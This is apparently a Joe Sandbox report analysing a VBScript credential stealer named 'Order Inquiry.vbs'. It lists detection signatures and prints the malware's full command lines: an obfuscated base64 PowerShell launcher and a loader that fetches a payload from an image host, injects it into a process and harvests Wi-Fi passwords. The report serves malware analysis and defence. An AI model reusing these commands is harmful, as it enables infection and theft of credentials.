Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Order Inquiry.vbs

Overview

General Information

Sample name:Order Inquiry.vbs
Analysis ID:1457271
MD5:443f85c9a27129786164968923b47193
SHA1:a45f63374b28561a0152e261bd57e5a2bb9c54f9
SHA256:f3ff35c81d1f64fe7a0f1fb55e1c732d091b8faedc4fcd35eef9d0afe5455a63
Tags:Formbookvbs
Infos:

Detection

PXRECVOWEIWOEI Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Sigma detected: Capture Wi-Fi password
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Yara detected AntiVM3
Yara detected PXRECVOWEIWOEI Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Check if machine is in data center or colocation facility
Connects to a pastebin service (likely for C&C)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Creates autostart registry keys with suspicious values (likely registry only malware)
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Opens network shares
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses netsh to modify the Windows network and firewall settings
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the product ID of Windows
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7592 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 7772 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBSDgTreHUDgTrebgBQDgTreEUDgTreLgBIDgTreG8DgTrebQBlDgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBtDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreLgBHDgTreGUDgTredDgTreBNDgTreGUDgTredDgTreBoDgTreG8DgTreZDgTreDgTreoDgTreCcDgTreVgBBDgTreEkDgTreJwDgTrepDgTreC4DgTreSQBuDgTreHYDgTrebwBrDgTreGUDgTreKDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreLDgTreDgTregDgTreFsDgTrebwBiDgTreGoDgTreZQBjDgTreHQDgTreWwBdDgTreF0DgTreIDgTreDgTreoDgTreCcDgTredDgTreB4DgTreHQDgTreLgBkDgTreHIDgTrebwB3DgTreHMDgTreLwDgTrexDgTreDcDgTreLgDgTre5DgTreDMDgTreLgDgTrezDgTreDIDgTreMQDgTreuDgTreDMDgTreOQDgTrevDgTreC8DgTreOgBwDgTreHQDgTredDgTreBoDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwDgTrexDgTreCcDgTreIDgTreDgTresDgTreCDgTreDgTreJwBcDgTreFwDgTredDgTreBzDgTreGMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreFwDgTreQwBcDgTreFDgTreDgTrecgBvDgTreGcDgTrecgBhDgTreG0DgTreIDgTreBGDgTreGkDgTrebDgTreBlDgTreHMDgTreXDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreYQBiDgTreHUDgTrecgByDgTreGEDgTrecgDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7908 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 8056 cmdline: "C:\Windows\System32\cmd.exe" /C copy *.vbs "\\tsclient\C\Program Files\aburrar.vbs" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 8064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • AddInProcess32.exe (PID: 8168 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: 9827FF3CDF4B83F9C86354606736CA9C)
          • cmd.exe (PID: 1160 cmdline: "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 1848 cmdline: chcp 65001 MD5: 20A59FB950D8A191F7D35C4CA7DA9CAF)
            • netsh.exe (PID: 3276 cmdline: netsh wlan show profile MD5: 4E89A1A088BE715D6C946E55AB07C7DF)
            • findstr.exe (PID: 4124 cmdline: findstr All MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
  • msiexec.exe (PID: 3232 cmdline: C:\Windows\system32\msiexec.exe /V MD5: E5DA170027542E25EDE42FC54C929077)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000009.00000002.1681596776.00000000030DC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_PXRECVOWEIWOEIYara detected PXRECVOWEIWOEI StealerJoe Security
    Process Memory Space: powershell.exe PID: 7772JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      Process Memory Space: powershell.exe PID: 7772INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
      • 0x55b80:$b2: ::FromBase64String(
      • 0x57040:$b2: ::FromBase64String(
      • 0x57653:$b2: ::FromBase64String(
      • 0x57d81:$b2: ::FromBase64String(
      • 0x58346:$b2: ::FromBase64String(
      • 0x559e5:$b3: ::UTF8.GetString(
      • 0x56ea5:$b3: ::UTF8.GetString(
      • 0x574b8:$b3: ::UTF8.GetString(
      • 0x57be6:$b3: ::UTF8.GetString(
      • 0x581ab:$b3: ::UTF8.GetString(
      • 0x434bd:$s1: -join
      • 0x465d6:$s1: -join
      • 0x66463:$s3: reverse
      • 0x66751:$s3: reverse
      • 0x66e6b:$s3: reverse
      • 0x67624:$s3: reverse
      • 0x6e7bf:$s3: reverse
      • 0x6ebd9:$s3: reverse
      • 0x6f761:$s3: reverse
      • 0x7040e:$s3: reverse
      • 0x80ed1:$s3: reverse
      Process Memory Space: powershell.exe PID: 7908JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        Process Memory Space: powershell.exe PID: 7908INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0x1d0b4:$b2: ::FromBase64String(
        • 0x1d80f:$b2: ::FromBase64String(
        • 0x1ddd4:$b2: ::FromBase64String(
        • 0x1f535:$b2: ::FromBase64String(
        • 0x1faef:$b2: ::FromBase64String(
        • 0x2091f:$b2: ::FromBase64String(
        • 0x1ad183:$b2: ::FromBase64String(
        • 0x1ad6cb:$b2: ::FromBase64String(
        • 0x673da5:$b2: ::FromBase64String(
        • 0x67435f:$b2: ::FromBase64String(
        • 0x67a96d:$b2: ::FromBase64String(
        • 0x67bfa6:$b2: ::FromBase64String(
        • 0x684564:$b2: ::FromBase64String(
        • 0x1cf19:$b3: ::UTF8.GetString(
        • 0x1d674:$b3: ::UTF8.GetString(
        • 0x1dc39:$b3: ::UTF8.GetString(
        • 0x1f39a:$b3: ::UTF8.GetString(
        • 0x1f954:$b3: ::UTF8.GetString(
        • 0x20784:$b3: ::UTF8.GetString(
        • 0x1acfe8:$b3: ::UTF8.GetString(
        • 0x1ad530:$b3: ::UTF8.GetString(
        Click to see the 3 entries
        SourceRuleDescriptionAuthorStrings
        amsi64_7908.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Spreading

          barindex
          Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138', 'https://uploaddeimagens.com.br/images/004/798/013/original/new_image.jpg?1718284138'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.drows/17.93.321.39//:ptth' , '1' , '\\tsclient\C\Program Files\' , 'aburrar','AddInProcess32',''))} }", CommandLine|base

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB